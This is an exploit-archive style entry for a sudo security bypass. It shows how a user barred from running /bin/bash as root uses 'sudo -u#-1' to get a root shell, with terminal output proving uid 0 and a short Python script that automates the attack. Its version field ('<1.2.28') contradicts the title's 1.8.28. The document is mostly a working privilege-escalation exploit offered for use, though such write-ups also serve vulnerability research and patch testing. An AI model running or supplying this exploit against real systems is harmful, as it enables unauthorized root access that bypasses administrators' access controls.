Share
# Exploit Title : sudo 1.8.28 - Security Bypass  
# Date : 2019-10-15  
# Original Author: Joe Vennix  
# Exploit Author : Mohin Paramasivam  
# Version : Sudo <1.2.28  
# Tested on Linux  
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug  
# Fix : The bug is fixed in sudo 1.8.28  
# CVE : N/A   
  
'''Check for the user sudo permissions  
  
sudo -l   
  
User hacker may run the following commands on kali:  
(ALL, !root) /bin/bash  
  
  
So user hacker can't run /bin/bash as root (!root)  
  
  
User hacker sudo privilege in /etc/sudoers  
  
# User privilege specification  
root ALL=(ALL:ALL) ALL  
  
hacker ALL=(ALL,!root) /bin/bash  
  
  
With ALL specified, user hacker can run the binary /bin/bash as any user  
  
EXPLOIT:   
  
sudo -u#-1 /bin/bash  
  
Example :   
  
hacker@kali:~$ sudo -u#-1 /bin/bash  
root@kali:/home/hacker# id  
uid=0(root) gid=1000(hacker) groups=1000(hacker)  
root@kali:/home/hacker#  
  
Description :  
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv  
-u#-1 returns as 0 which is root's id  
  
and /bin/bash is executed with root permission  
Proof of Concept Code :  
  
How to use :  
python3 sudo_exploit.py  
  
'''  
  
  
#!/usr/bin/python3  
  
import os  
  
#Get current username  
  
username = input("Enter current username :")  
  
  
#check which binary the user can run with sudo  
  
os.system("sudo -l > priv")  
  
  
os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")  
  
binary_file = open("binary")  
  
binary= binary_file.read()  
  
#execute sudo exploit  
  
print("Lets hope it works")  
  
os.system("sudo -u#-1 "+ binary)